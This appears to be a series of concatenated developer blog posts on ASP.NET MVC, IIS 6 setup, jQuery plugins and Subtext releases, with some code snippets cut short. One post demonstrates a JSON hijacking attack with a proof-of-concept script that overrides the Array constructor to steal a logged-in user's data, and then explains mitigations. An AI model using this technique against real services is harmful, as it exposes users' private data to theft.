mvc, comments edit

I’m working to try and keep internal release notes up to date so that I don’t have this huge amount of work when we’re finally ready to release. Yeah, I’m always trying something new by giving procrastination a boot today.

These notes were sent to me by Jacques, a developer on the ASP.NET MVC feature team. I only cleaned them up slightly.

The sections below contain descriptions and possible solutions for known issues that may cause the installer to fail. The solutions have proven successful in most cases.

Visual Studio Add-ins

The ASP.NET MVC installer may fail when certain Visual Studio add-ins are already installed. The final steps of the installation installs and configures the MVC templates in Visual Studio. When the installer encounters a problem during these steps, the installation will be aborted and rolled back. MVC can be installed from a command prompt using msiexec to produce a log file as follows:

msiexec /i AspNetMVCBeta-setup.msi /q /l*v mvc.log

If an error occurred the log file will contain an error message similar to the example below.

MSI (s) (C4:40) [20:45:32:977]: Note: 1: 1722 2: VisualStudio_VSSetup_Command 3: C:\Program Files\Microsoft Visual Studio 9.0\Common7\IDE\devenv.exe 4: /setup

MSI (s) (C4:40) [20:45:32:979]: Product: Microsoft ASP.NET MVC Beta – Error 1722. There is a problem with this Windows Installer package. A program run as part of the setup did not finish as expected. Contact your support personnel or package vendor. Action VisualStudio_VSSetup_Command, location: C:\Program Files\Microsoft Visual Studio 9.0\Common7\IDE\devenv.exe, command: /setup

Error 1722. There is a problem with this Windows Installer package. A program run as part of the setup did not finish as expected. Contact your support personnel or package vendor. Action VisualStudio_VSSetup_Command, location: C:\Program Files\Microsoft Visual Studio 9.0\Common7\IDE\devenv.exe, command: /setup

This error is usually accompanied by a corresponding event that will be logged in the Windows Event Viewer:

Faulting application devenv.exe, version 9.0.30729.1, time stamp 0x488f2b50, faulting module unknown, version, time stamp 0x00000000, exception code 0xc0000005, fault offset 0x006c0061, process id 0x10e0, application start time 0x01c9355ee383bf70

In most cases, removing the add-ins before installing MVC, and then reinstalling the add-ins, will resolve the problem. ASP.NET MVC installations have been known to run into problems when the following add-ins were already installed.:

  • PowerCommands
  • Clone Detective

Cryptographic Services

In a few isolated cases, the Windows Event Viewer may contain an Error event with event source CAPI2 and event ID 513. The event message will contain the following: Cryptograhpic Services failed while processing the OnIdentity() call in the System Writer Object.

The article at describes various steps a user can take to correct the problem, but in some cases simply stopping and restarting the Cryptographic services should allow the installation to proceed.

subtext comments edit

A Subtext user found a security flaw which opens up Subtext to potential XSS attacks via comment. This flaw was introduced in Subtext 2.0 by the feature which converts URLs to anchor tags. If you are still on 1.9.5b or before, you are not affected by this issue. If you upgraded to 2.0, then please update to 2.1 as soon as you can.

Note that you can edit comments in the admin section of your blog to fix comments if someone attempts to abuse your comments.

This release has several other bug fixes and usability improvements as well. I started to replace the use of UpdatePanel in some areas with straight up jQuery, which ends up reducing bandwidth usage.

List of bug fixes and changes:

  • Fixed Medium Trust issue by removing calls to UrlAuthorizationModule.CheckUrlAccessForPrincipal which is not allowed from medium trust.
  • Removed email address from RSS feed by default and added Web.config setting to change this in order to protect against spamming.
  • Upgraded Jayrock assembly to fix the issue with VerificationException being thrown.
  • Fixed code which strips HTML from comments when displaying recent comments. Certain cases would cause CPU spike.
  • Fixed Remember Me functionality for the OpenID login.
  • Fixed a bug with adding categories in which an error was displayed, even though the category was added correctly.
  • Fixed a bug in the code to convert URLs to anchor tags.
  • Upgraded jQuery to version 1.2.6
  • Improved the timezone selection UI with jQuery

I was the one who implemented the feature at fault. Unfortunately the way the feature was written made it such that it reversed earlier scrubbing of the HTML due to a mistake in how I used SgmlReader. I apologize for the mistake. It won’t happen again.

Many thanks go out to Adrian Bateman for pointing out the bug and the fix.

Notes for new installations

The install package includes a default Subtext2.1.mdf file for SQL 2005 Express. If you plan to run your blog off of SQL Server Express, installation is as easy as copying the install files to your Web Root. If you’re not using SQL Express, but plan to use SQL Server 2005, you can attach to the supplied .mdf file and use it as your database.

Notes for upgrading

In the app_data folder of the install package, feel free to delete the database files there. They only apply to new installs. Subtext 2.1 does not have any schema changes, so upgrading should be smooth.

Full upgrade instructions are on the Subtext project website.

Download it here. Note that the file is the one you want to use to upgrade your site. The other file contains the source in case you want to build the solution.

subtext comments edit

How many of you out there who use Subtext host it on a hosting provider who does not have ASP.NET 3.5 available? I’d like to make the next version of Subtext 2 take a dependency on 3.5. Note that it wouldn’t have to take a dependency on SP1. Just ASP.NET 3.5 proper as I believe most hosting providers support it.

If you’re stuck with a hosting provider who only supports ASP.NET 2.0 and not 3.5, do leave a comment.

Note that we’re still in the planning stages for Subtext 3, which will be built on ASP.NET MVC. In the meantime, I still plan to update Subtext 2.*. In fact, much of the work we will do for Subtext 3 may be prototyped in 2.* and ported over. mvc, comments edit

UPDATE: If you run ASP.NET MVC on IIS 6 with ASP.NET 4, setting up extensionless URLs just got easier. In most cases, it should just work.

I’ve seen a lot of reports where people have trouble getting ASP.NET MVC up and running on IIS 6. Sometimes the problem is a very minor misconfiguration, sometimes it’s a misunderstanding of how IIS 6 works.

In this post, I want to provide a definitive guide to getting ASP.NET MVC running on IIS 6. I will walk through using the .mvcor .aspx file extension for URLs first, then I will walkthrough using extension-less URLs.

If you’re running into problems with IIS 6 and ASP.NET MVC, I recommend trying to walk through all the steps in this post, even if you’re not interested in using the .mvcor.aspx mapping. Some of the lessons learned here have more to do with how ASP.NET itself works with IIS 6 than anything specific to ASP.NET MVC.

Initial Setup

To make this easy, start Visual Studio and create a new ASP.NET MVC Web Application Projecton the machine with IIS 6. If your IIS 6 machine is on a different machine, you can skip this step. We can deploy the site to the machine later.

After you create the project, right click the project and select Properties. The project properties editor will open up. Select the Web tab and select Use IIS Web Server.Click on the image for a full size view.

Project Properties

In the project URL, I gave it a virtual application name of Iis6DemoWeb and then checked Create Virtual Directory. A dialog box should appear and you should now have an IIS virtual application (note this is different than a virtual directory, as indicated by the gear looking icon) under your Default Web Site.

IIS 6 Virtual Web

Using a URL File Extensions

When you run the ASP.NET MVC installer, it will set up an ISAPI mapping in IIS 6 to map the .mvc extension to the aspnet_isapi.dll. This is necessary in order for IIS to hand off requests using the .mvc file extension to ASP.NET.

If you’re planning to use extension-less URLs, you can skip this section, but it may be useful to read anyways as it has some information you’ll need to know when setting up extension-less URLs.

Mapping .mvc to ASP.NET

If you plan to use the .mvc URL extension, and are going to deploy to IIS 6 on a machine that does not have ASP.NET MVC installed, you’ll need to create this mapping by performing the following steps.

One nice benefit of using the .aspx extension instead of .mvc is that you don’t have to worry about mapping the .aspx extension. It should already be mapped assuming you have ASP.NET installed properly on the machine.

For the rest of you, start by right clicking on the Virtual Application node (IIS6DemoWeb in this case) and select Properties. You should see the following dialog.


Make sure you’re on the Virtual Directory tab and select Configuration. Note that you can also choose to make this change on the root website, in which case the tab you’re looking for is Home Directory not Virtual Directory.

This will bring up the Application Configuration dialog which displays a list of ISAPI mappings. Scroll down to see if .mvc is in the list.


In the screenshot, you can see that .mvc is in the list. If it is in the list on your machine, you can skip ahead to the next section. If it’s not in the list for you, let’s add it to the list. You’re going to need to know the path to the aspnet_isapi.dll first. On my machine, it is:


It might differ on your machine. One easy way to find out is to find the .aspx extension in the list and double click it to bring up the mapping dialog.


Now you can copy the path in the Executable text box to your clipboard. This is the path you’ll want to map .mvc to.

Click Cancel to go back to the Application Configuration dialog and then click Addwhich will bring up an empty Add/Edit Application Extension Mapping dialog.

Fill in the fields with the exact same values as you saw for .aspx, except the extension should be “.mvc” without the quotes. Click OK and you’re done with the mapping.

Specifying Routes with an Extension

Before we run the application, we need to update the default routes to look for the file extension we chose, whether it be .mvc or .aspx extension. Here is the RegisterRoutes method in my Global.asax.cs file using the .mvc extension. If you want to use the .aspxextension, just replace {controller}.mvc with {controller}.aspx.

public static void RegisterRoutes(RouteCollection routes)

    new { action = "Index", id = "" }

    new { controller = "Home", action = "Index", id = "" }

Note that because the second route, “Default”, has a literal extension as part of the URL segment, it cannot match a request for the application root. That’s why I have a third route named “Root” which can match requests for the application root.

Now, I can hit CTRL+F5 (or browse my website) and I should see the following home page.


And about page.


Notice that the URLs contain the .mvc extension.

Uh oh, Houston! We have a problem

Of course, you’re going to want to be able to navigate to the web root for your project. Notice what happens when you navigate to /Iis6DemoWeb.

Root Home

This is a bug in the Default.aspx.cs file included with our default template which I discovered as I was writing this walkthrough. We’ll fix it right away, but I can provide the fix here as it’s insanely easy.

Note: If you received a File Not Found error when visiting the root, then you might not have Default.aspx mapped as a default document. Follow these steps to add Default.aspx as a default document.

As I’ve written before, this file is necessary for IIS 6, IIS 7 Classic Mode, and pre SP1 Cassini, but not IIS 7 Integrated. So if you’re using Cassini with Visual Studio 2008 SP1 and deploying to IIS 7 Integrated, you can delete Default.aspx and its sub-files.

In the meanwhile, the fix is to make the following change.




HttpContext.Current.RewritePath(Request.ApplicationPath, false);

If you created your website in the IIS root rather than a virtual application, you would never have noticed this issue. But in the virtual application, the URL to the stylesheet rendered contained the virtual application name, when it shouldn’t. Changing the second argument to false fixes this.

IIS6 Extension-less URLs

Ok, now we’re ready to try this with extension-less URLs using the infamous “Star mapping” or “Wildcard mapping” feature of IIS 6. I say infamous because there is a lot of concern over the performance implications of doing this. Of course, you should measure the performance of your site for yourself to determine if it is really a problem.

The first step is to go back to the Application Configuration Properties dialog like we did when configuring the .mvc ISAPI mapping (see, I told you that information might come in useful later).


Next to the Wildcard application maps section, click the Insert… button.

wildcard extension

This brings up the wildcard application mapping dialog. Enter the path to the aspnet_isapi.dll. You can follow the trick we mentioned earlier for getting this path.

Don’t forget to uncheck the Verify that file exists checkbox! This is one of the most common mistakes people make.

If you’ve been following along everything in this post, you’ll need to go back and reset the routes in your Global.asax.cs file to the default routes. You no longer need the .mvc file extension in the routes. At this point, you can also remove Default.aspx if you’d like. It’s not needed.

Now when you browse your site, your URLs will not have a file extension as you can see in the following screenshots.

Home page without

About page without


Final Tips

One thing to understand is that an ASP.NET project is scoped to the Website or Virtual Application in which it resides. For example, in the example I have here, we pointed a Virtual Application named IIS6DemoWeb to the directory containing my ASP.NET MVC web application.

Thus, only requests for that virtual application will be handled by my web application. I cannot make a request for http://localhost/ in this case and expect it to be handled by my application. Nor can I expect routing in this application to handle requests for another root directory such as http://localhost/not-my-app/.

This might seem like an obvious thing to say, but I know it trips some people up. Also, in the example I did here, I used a virtual application for demonstration purposes. It’s very easy to point a root Website in IIS to my application and run it in http://localhost/ rather than a virtual application. This is not a problem. I hope you found this helpful. comments edit

As I mentioned before, I’m really excited that we’re shipping jQuery with ASP.NET MVC and with Visual Studio moving forward. Just recently, we issued a patch that enables jQuery Intellisense to work in Visual Studio 2008.

But if you’re new to jQuery, you might sit down at your desk ready to take on the web with your knew found JavaScript light saber, only to stare blankly at an empty screen asking yourself, “Is this it?”

See, as exciting and cool as jQuery is, it’s really the vast array of plugins that really give jQuery its star power. Today I wanted to play around with integrating two jQuery plugins – the jQuery Form Plugin used to submit forms asynchronously and the jQuery Validation plugin used to validate input.

Since this is a prototype for something I might patch into Subtext, which still targets ASP.NET 2.0, I used Web Forms for the demo, though what I do here easily applies to ASP.NET MVC.

Here are some screenshots of it in action. When I click the submit button, it validates all the fields. The email field is validated after the input loses focus.


When I correct the data and click “Send Comment”, it will asynchronously display the posted comment.


Let’s look at the code to make this happen. Here’s the relevant HTML markup in my Default.aspx page:

<div id="comments" ></div>

<form id="form1" runat="server">
<div id="comment-form">
    <asp:Label AssociatedControlID="title" runat="server" Text="Title: " />
    <asp:TextBox ID="title" runat="server" CssClass="required" />
    <asp:Label AssociatedControlID="email" runat="server" Text="Email: " />
    <asp:TextBox ID="email" runat="server" CssClass="required email" />
    <asp:Label AssociatedControlID="body" runat="server" Text="Body: " />
    <asp:TextBox ID="body" runat="server" CssClass="required" />
  <input type="hidden" name="<%= submitButton.ClientID %>" 
    value="Send Comment" />
  <asp:Button runat="server" ID="submitButton" 
    OnClick="OnFormSubmit" Text="Send Comment" />

I’ve called out a few important details in code. The top DIV is where I will put the response of the AJAX form post. The CSS classes on the elements provide validation meta-data to the Validation plugin. What the heck is that hidden input doing there?

Notice that hidden input that duplicates the field name of the submit button. That’s the ugly hack part I did. The jQuery Form plugin doesn’t actually submit the value of the input button. I needed that to be submitted in order for the code behind to work. When you click on the submit button, a method named OnFormSubmit gets called in the code behind.

Let’s take a quick look at that method in the code behind.

protected void OnFormSubmit(object sender, EventArgs e) {
    var control = Page.LoadControl("~/CommentResponse.ascx") 
        as CommentResponse;
    control.Title = title.Text;
    control.Email = email.Text;
    control.Body = body.Text;

    var htmlWriter = new HtmlTextWriter(Response.Output);

Notice here that I’m just instantiating a user control, setting some properties of the control, and then rendering it to the output stream. I’m able to access the values in the submitted form by accessing the ASP.NET controls.

This is sort of like the Web Forms equivalent of ASP.NET MVC’s partial rendering ala the return PartialView() method. Here’s the code for that user control.

<%@ Control Language="C#" CodeBehind="CommentResponse.ascx.cs" 
    Inherits="WebFormValidationDemo.CommentResponse" %>
<div style="color: blue; border: solid 1px brown;">
        Thanks for the comment! This is what you wrote.
        <label>Title:</label> <%= Title %>
        <label>Email:</label> <%= Email %>
        <label>Body:</label> <%= Body %>

Along with its code behind.

public partial class CommentResponse : System.Web.UI.UserControl {
    public string Title { get; set; }
    public string Email { get; set; }
    public string Body { get; set; }

Finally, let’s look at the script in the head section that ties this all together and makes it work.

<script src="scripts/jquery-1.2.6.min.js" type="text/javascript"></script>
<script src="scripts/jquery.validate.js" type="text/javascript"></script>
<script src="scripts/jquery.form.js" type="text/javascript"></script>
<% if (false) { %>
<script src="scripts/jquery-1.2.6-vsdoc.js" type="text/javascript"></script>
<% } %>
<script type="text/javascript">
    $(document).ready(function() {
        $("#<%= form1.ClientID %>").validate({
            submitHandler: function(form) {
                    target: "#comments"

The if(false) section is for the jQuery intellisense, which only matters to me at design time, not runtime.

What we’re doing here is getting a reference to the form and calling the validate method on it. This sets up the form for validation based on validation meta data stored in the CSS classes for the form inputs. It’s possible to do this completely external, but one nice thing about this approach is now you can style the fields based on their validation attributes.

We then register the ajaxSubmit method of the jQuery Form plugin as the submit handler for the form. So when the form is valid, it will use the ajaxSubmit method to post the form, which posts it asynchronously. In the arguments to that method, I specify the #comments selector as the target of the form. So the response from the form submission gets put in there.

As I mentioned before, the hidden input just ensures that ASP.NET runs its lifecycle in response to the form post so I can handle the response in the button’s event handler. In ASP.NET MVC, you’d just point this to an action method instead and not worry about adding the hidden input.

In any case, play around with these two plugins as they provide way more rich functionality than what I covered here., code comments edit

I recently learned about a very subtle potential security flaw when using JSON. While subtle, it was successfully demonstrated against GMail a while back. The post, JSON is not as safe as people think it is, covers it well, but I thought I’d provide step-by-step coverage to help make it clear how the exploit works.

The exploit combines Cross Site Request Forgery (CSRF) with a JSON Array hack allowing an evil site to grab sensitive user data from an unsuspecting user. The hack involves redefining the Array constructor, which is totally legal in Javascript.

Let’s walk through the attack step by step. Imagine that you’re logged in to a trusted site. The site makes use of JavaScript which makes GET requests to a JSON service:

GET: /demos/secret-info.json

that returns some sensitive information:

["Philha", "my-confession-to-crimes", 7423.42]

Now you need to be logged in to get this data. If you go to a fresh browser and type in the URL to /demos/secret-info.json, you’ll get redirected to a login page (in my demo, that’s not the case. You’ll have to trust me on this).

But now suppose you accidentally visit and it has the following scripts in the <head /> section. Notice the second script references the JSON service on the good site.

<script type="text/javascript">
var secrets;

Array = function() {
  secrets = this;

<script src="" 

<script type="text/javascript">

  var yourData = '';
  var i = -1;
  while(secrets[++i]) {
    yourData += secrets[i] + ' ';

  alert('I stole your data: ' + yourData);

When you visit the page, you will see the following alert dialog…

evil alert message

…which indicates that the site was able to steal your data.

How does this work?

There are two key parts to this attack. The first is that although browsers stop you from being able to make cross-domain HTTP requests via JavaScript, you can still use the src attribute of a script tag to reference a script in another domain and the browser will make a request and load that script.

The worst part of this is that the request for that script file is being made by your browser with your credentials. If your session on that site is still valid, the request will succeed and now your sensitive information is being loaded into your browser as a script.

That might not seem like a problem at this point. So what if the data was loaded into the browser. The browser is on your machine and a JSON response is not typically valid as the source for a JavaScript file. For example, if the response was…

{"d": ["Philha", "my-confession-to-crimes", 7423.42]}

…pointing a script tag to that response would cause an error in the browser. So how’s the evil guy going to get the data from my browser to his site?

Well It turns out that returning a JSON array is valid as the source for a JavaScript script tag. But the array isn’t assigned to anything, so it would evaluate and then get discarded, right?. What’s the big deal?

That’s where the second part of this attack comes into play.

var secrets;
Array = function() {
  secrets = this;

JavaScript allows us to redefine the Array constructor. In the evil script above, we redefine the array constructor and assign the array to a global variable we defined. Now we have access to the data in the array and can send it to our evil site.

In the sample I posted above, I just wrote out an alert. But it would be very easy for me to simply document.write a 1 pixel image tag where the URL contains all the data in the JSON response.


One common mitigation is to make sure that your JSON service always returns its response as a non-array JSON object. For example, with ASP.NET Ajax script services, they always append a “d” property to the response, just like I demonstrated above. This is described in detail in this quickstart:

The ASP.NET AJAX library uses the “d” parameter formatting for JSON data. This forces the data in the example to appear in the following form:

{“d” : [“bankaccountnumber”, “$1234.56”] }

Because this is not a valid JavaScript statement, it cannot be parsed and instantiated as a new object in JavaScript. This therefore prevents the cross-site scripting attack from accessing data from AJAX JSON services on other domains.

The Microsoft Ajax client libraries automatically strip the “d” out, but other client libraries, such as JQuery, would have to take the “d” property into account when using such services.

Another potential mitigation, one that ASP.NET Ajax services do by default too, is to only allow POST requests to retrieve sensitive JSON. Since the script tag will only issue a GET request, a JSON service that only responds to POST requests would not be susceptible to this attack, as far as I know.

For those that keep track, this is why I asked on Twitter recently how many use GET requests to a JSON endpoint.

How bad is this?

It seems like this could be extremely bad as not many people know about this vulnerability. After all, if GMail was successfully exploited via this vulnerability, who else is vulnerable?

The good news is that it seems to me that most modern browsers are not affected by this. I have a URL you can click on to demonstrate the exploit, but you have to use FireFox 2.0 or earlier to get the exploit to work. It didn’t work with IE 6, 7, 8, FireFox 3 nor Google Chrome.

Take this all with a grain of salt of course because there may be a more sophisticated version of this exploit that does work with modern browsers.

So the question I leave to you, dear reader, is given all this, is it acceptable to you for a JSON service containing sensitive data to require a POST request to obtain that data, or would that inspire righteous RESTafarian rage? mvc comments edit

Pop quiz. What would you expect these three bits of HTML to render?

<!-- no new lines after textarea -->

<!-- one new line after textarea -->

<!-- two new lines after textarea -->


The fact that I’m even writing about this might make you suspicious of your initial gut answer. Mine would have been that the first would render a text area with “Foo” on the first line, the second with it on the second line, and the third with it on the third line.

In fact, here’s what it renders using Firefox 3.0.3. I confirmed the same behavior with IE 8 beta 2 and Google Chrome.

three text

Notice that the first two text areas are identical. Why is this important?

Suppose you’re building an ASP.NET MVC website and you call the following bit of code:

<%= Html.TextArea("name", "\r\nFoo") %>

You probably would expect to see the third text area in the screenshot above in which “Foo” is rendered on the second line, not the first.

However, suppose our TextArea helper didn’t factor in the actual behavior that browsers exhibit. You would in this case get the behavior of the second text area in which “Foo” is still on the first line.

Fortunately, our TextArea helper does factor this in and renders the supplied value on the next line after the textarea tag. In my mind, this is very much an edge case, but it was reported as a bug by someone external a while back. Isn’t HTML fun?! ;), mvc comments edit

One of the relatively obscure features of ASP.NET view rendering is that you can render a single view using multiple view engines.

Brad Wilson actually mentioned this in his monster blog post about Partial Rendering and View Engines in ASP.NET MVC, but the implications may have been lost amongst all that information provided.

One of the best features of this new system is that your partial views can use a different view engine than your views, and it doesn’t require any coding gymnastics to make it happen. It all comes down to how the new view system resolves which view engine renders which views.

Let’s dig into a brief example of this in action to understand the full story. Lately, I’ve been playing around with the Spark view engine lately and really like what I see there. Unlike NHaml which pretty gets rid of all angle brackets via a terse DSL for generating HTML, Spark takes the approach that HTML itself should be the “language” for defining the view.

This is not to say that one is specifically better than the other, I’m just highlighting the difference between the two.

Let’s take a look at a small snippet of Spark markup:

  <li each='var p in ViewData.Model.Products'>
    ${p.Name} ${Html.ActionLink("Edit Product", "Edit")}

Notice that rather than embedding a for loop in the code, you apply the each attribute to a piece of markup to denote that it should be repeated. This is much more declarative than using code nuggets to define a for loop.

As a demonstration, I thought I would take the default ASP.NET MVC project template and within the Index.aspx view, I would render a partial using the Spark view engine.

After referencing the appropriate assemblies from the Spark project, Spark.dll and Spark.Mvc.dll, I registered the spark view engine in Global.asax.cs like so:

protected void Application_Start() {
    ViewEngines.Engines.Add(new SparkViewFactory());

I then created a small spark partial view…

<div class="spark-partial">
    <if condition='ViewData.ContainsKey("Title")'>
    <p>${Html.ActionLink("About Page", "About")}</p>

… and added it to the appropriate directory. I also added a bit of CSS to my default stylesheet in order to highlight the partial.


In my Index.aspx view, I added a call to the Html.RenderPartial helper method.

<p>This is a WebForm View.</p>
<p>But the bordered box below, is a partial rendered using Spark.</p>
<% Html.RenderPartial("SparkPartial"); %>

And the result…

spark partial view

When we tell the view to render the partial view named “SparkPartial”, ASP.NET MVC will ask each registered view engine, “Hey, yous happens to knows a partial who goes by the name of SparkPartial? I have some unfinished bidness wid this guy.”

Yes, our view infrastructure speaks like a low level mobster thug.

The first view engine that answers yes, gets to render that particular view or partial view. The benefit of this is that if you create a partial view using one view engine, you can reuse that partial on another site that might use a different view engine as its default.

If you want to try out the demo I created, download it and give it a twirl. It is built against ASP.NET MVC Beta. mvc, comments edit

Quick question? What’s higher than a kite?

No, it’s not me nor Cheech and Chong. It’s a cloud!

Bad jokes (but funny video link) aside, Windows Azure, Microsoft’s foray into cloud computing, is getting a lot of attention right now. The basic idea behind cloud computing is you can host your application in the cloud and pay a monthly fee much like a utility such as paying for water and power.

The benefit is you don’t have to deal with the infrastructure work and maintenance and you get “elastic” scalability, meaning your application can dynamically scale to meet rising need without much work on your part. That’s the idea at least.

The Saturday evening before I left for the PDC, Eilon (lead dev for ASP.NET MVC) and I got together to try out ASP.NET MVC with the Azure Dev Fabric environment. This was something we promised to prototype for Jim Nakashima of the Azure team before the PDC, but were … ah … a little late to deliver. ;)

We had good reason as we had been pre-occupied with getting the Beta release out, but still felt bad for totally dropping the ball, hence the late Saturday night pair programming session.

It turned out that it didn’t take long to get the default ASP.NET MVC project template sample app running in the Dev Fabric, which Jim later posted to his blog. Unfortunately, we didn’t invite a QA person over that evening and didn’t test the entire site thoroughly. While the home and about page worked, the account pages requiring the Membership Provider didn’t. Doh!

Fortunately Jim recently updated the sample to now work with ASP.NET Providers running in the cloud and posted it to his blog. Even before Jim updated the sample we delivered to him, Aaron Lerch posted his own step by step guide to getting providers to work. Nice!

The sample project Jim posted has some fixes to the project that allow it to work in the actual cloud. There were a couple of minor bugs regarding rendering URLs with port numbers when using our form helpers (already fixed in our trunk) that would not affect most people, but does happen to affect running in the cloud., mvc comments edit

I’ve heard a lot of concerns from people worried that the ASP.NET team will stop sparing resources and support for Web Forms in favor of ASP.NET MVC in the future. I thought I would try to address that concern in this post based on my own observations.

At the PDC, a few people explicitly told me, not without a slight tinge of anger, that they don’t get ASP.NET MVC and they like Web Forms just fine thank you very much. Hey man, that’s totally cool with me! Please don’t make me the poster boy for killing Web Forms. If you like Web Forms, it’s here to stay. ;)

I can keep telling you that we’re continuing to invest in Web Forms until my face is blue, but that probably won’t be convincing. So I will instead present the facts and let you draw your own conclusions.

ASP.NET Themes

If you watch the ASP.NET 4.0 Roadmap talk at PDC, you’ll see that there are five main areas of investment that the ASP.NET team is working on. I’ll provide a non-comprehensive brief summary of the five here.

Core Infrastructure

With our core infrastructure, we’re looking to address key customer pain points and improve scale and performance.

One feature towards this goal is cache extensibility which will allow plugging in other cache products such as Velocity as a cache provider. We’ll also enhance ASP.NET Session State APIs. There are other scalability investments I don’t even personally understand all too deeply. ;)

To learn more about our cache extensibility plans, check out this PDC talk by Stefan Schackow.

Web Forms

In WebForms, we’re looking to address Client IDs which allow developers to control the id attribute value rendered by server controls. We’re adding support for URL routing with Web Forms. We’re planning to improve ViewState management by providing fine grain control over it. And we’re making investments in making our controls more CSS friendly. There are many other miscellaneous improvements to various control we’re making that would require me to query and filter the bug database to list, and I’m too lazy to do that right now.


With Ajax, we’re implementing client side templates and data binding. Our team now owns the Ajax Control Toolkit so we’re looking at opportunities to possibly roll some of those server controls into the core framework. And of course, we’ve added jQuery to our offerings along with jQuery Intellisense.

To see more about our investments here, check out Bertrand Le Roy’s Ajax talk at PDC.

Data and Dynamic Data

In Dynamic Data (which technically could fall in the Web Forms bucket) we’re looking to add support for an abstract data layer which would allow for POCO scaffolding. We’re implementing many-to-many relationships, enhanced filtering, enhanced meta-data, and adding new field templates.

There’s a lot of cool stuff happening here. To get more details on this, check out Scott Hunter’s Dynamic Data talk at PDC.


We’re still working on releasing 1.0. In the future, we hope to leverage some of the Dynamic Data work into ASP.NET MVC.

Notice here that ASP.NET MVC is just one of these five areas we’re investing in moving forward. It’s not somehow starving our efforts in other areas.

Feature Sharing

One other theme I’d like to highlight is that when we evaluate new features, we try and take a hard look at how it fits into the entire ASP.NET architecture as a whole, looking both at ASP.NET MVC and ASP.NET Web Forms. In many cases, we can share the bulk of the feature with both platforms with a tiny bit of extra work.

For example, ASP.NET Routing was initially an ASP.NET MVC feature only, but we saw it could be more broadly useful and it was shared with Dynamic Data. It will eventually make its way into Web Forms as well. Likewise, Dynamic Data started off as a Web Forms specific feature, but much of it will make its way into ASP.NET MVC in the future.


It’s clear that ASP.NET MVC is getting a lot of attention in part because it is shiny and new, and you know how us geeks loves us some shiny new toys. Obviously, I don’t believe this is the only reason it’s getting attention, as there is a lot of goodness in the framework, but I can see how all this attention tends to skew perceptions slightly. To put it in perspective, let’s look at the reality.

Currently, ASP.NET MVC hasn’t even been released yet. While the number of users interested in and building on ASP.NET MVC is growing, it is clearly a small number compared to the number of Web Form developers we have.

Meanwhile, we have millions of ASP.NET developers productively using Web Forms, many of whom are just fine with the Web Form model as it meets their needs. As much as I love the ASP.NET MVC way of doing things, I understand it doesn’t suit everyone, nor every scenario.

So with all this investment going on, I hope it’s clear that we are continuing to invest in Web Forms along with the entire ASP.NET framework.

code comments edit

UPDATE: I added three new unit tests and one interesting case in which the three browser render something differently.

Well I’m back at it, but this time I want to strip all HTML from a string. Specifically:

  • Remove all HTML opening and self-closing tags: Thus <foo> and <foo /> should be stripped.
  • Remove all HTML closing tags such as </p>.
  • Remove all HTML comments.
  • Do not strip any text in between tags that would be rendered by the browser.

This may not sound all that difficult, but I have a feeling that many existing implementations out there would not pass the set of unit tests I wrote to verify this behavior.

I’ll present some pathological cases to demonstrate some of the odd edge cases.

We’ll start with a relative easy one.

<foo title=">" />

Notice that this tag contains the closing angle bracket within an attribute value. That closing bracket should not close the tag. Only the one outside the attribute value should close it. Thus, the method should return an empty string in this case.

Here’s another case:

<foo =test>title />

This is a non quoted attribute value, but in this case, the inner angle bracket should close the tag, leaving you with “title />”.

Here’s a case that surprised me.


That one strips everything except “<>Test”.

It gets even better…


strips out everything except “Test”.

And finally, here’s one that’s a real doozy.


Check out how FireFox, IE, and Google Chrome render this same piece of markup.




One of these kids is doing his own thing! ;) For my unit test, I decided to go with majority rules here (I did not test with Opera) and went with the behavior of the two rather than Firefox.

The Challenge

The following is the shell of a method for stripping HTML from a string based on the requirements listed above.

public static class Html {
  public static string StripHtml(string html) {
    throw new NotImplementedException("implement this");

Your challenge, should you choose to accept it, is to implement this method such that the following unit tests pass. I apologize for the small font, but I used some long names and wanted it to fit.

public void NullHtml_ThrowsArgumentException() {
    try {
    catch (ArgumentNullException) {

public void Html_WithEmptyString_ReturnsEmpty() {
    Assert.AreEqual(string.Empty, Html.StripHtml(string.Empty));

public void Html_WithNoTags_ReturnsTextOnly() {
    string html = "This has no tags!";
    Assert.AreEqual(html, Html.StripHtml(html));

public void Html_WithOnlyATag_ReturnsEmptyString() {
    string html = "<foo>";
    Assert.AreEqual(string.Empty, Html.StripHtml(html));

public void Html_WithOnlyConsecutiveTags_ReturnsEmptyString() {
    string html = "<foo><bar><baz />";
    Assert.AreEqual(string.Empty, Html.StripHtml(html));

public void Html_WithTextBeforeTag_ReturnsText() {
    string html = "Hello<foo>";
    Assert.AreEqual("Hello", Html.StripHtml(html));

public void Html_WithTextAfterTag_ReturnsText() {
    string html = "<foo>World";
    Assert.AreEqual("World", Html.StripHtml(html));

public void Html_WithTextBetweenTags_ReturnsText() {
    string html = "<p><foo>World</foo></p>";
    Assert.AreEqual("World", Html.StripHtml(html));

public void Html_WithClosingTagInAttrValue_StripsEntireTag() {
    string html = "<foo title=\"/>\" />";
    Assert.AreEqual(string.Empty, Html.StripHtml(html));

public void Html_WithTagClosedByStartTag_StripsFirstTag() {
    string html = "<foo <>Test";
    Assert.AreEqual("<>Test", Html.StripHtml(html));

public void Html_WithSingleQuotedAttrContainingDoubleQuotesAndEndTagChar_StripsEntireTag() { 
    string html = @"<foo ='test""/>title' />";
    Assert.AreEqual(string.Empty, Html.StripHtml(html));

public void Html_WithDoubleQuotedAttributeContainingSingleQuotesAndEndTagChar_StripsEntireTag() {
    string html = @"<foo =""test'/>title"" />";
    Assert.AreEqual(string.Empty, Html.StripHtml(html));

public void Html_WithNonQuotedAttribute_StripsEntireTagWithoutStrippingText() {
    string html = @"<foo title=test>title />";
    Assert.AreEqual("title />", Html.StripHtml(html));

public void Html_WithNonQuotedAttributeContainingDoubleQuotes_StripsEntireTagWithoutStrippingText() {
    string html = @"<p title = test-test""-test>title />Test</p>";
    Assert.AreEqual("title />Test", Html.StripHtml(html));

public void Html_WithNonQuotedAttributeContainingQuotedSection_StripsEntireTagWithoutStrippingText() {
    string html = @"<p title = test-test""- >""test> ""title />Test</p>";
    Assert.AreEqual(@"""test> ""title />Test", Html.StripHtml(html));

public void Html_WithTagClosingCharInAttributeValueWithNoNameFollowedByText_ReturnsText() {
    string html = @"<foo = "" />title"" />Test";
    Assert.AreEqual("Test", Html.StripHtml(html));

public void Html_WithTextThatLooksLikeTag_ReturnsText() {
    string html = @"<çoo = "" />title"" />Test";
    Assert.AreEqual(html, Html.StripHtml(html));

public void Html_WithCommentOnly_ReturnsEmptyString() {
    string s = "<!-- this go bye bye>";
    Assert.AreEqual(string.Empty, Html.StripHtml(s));

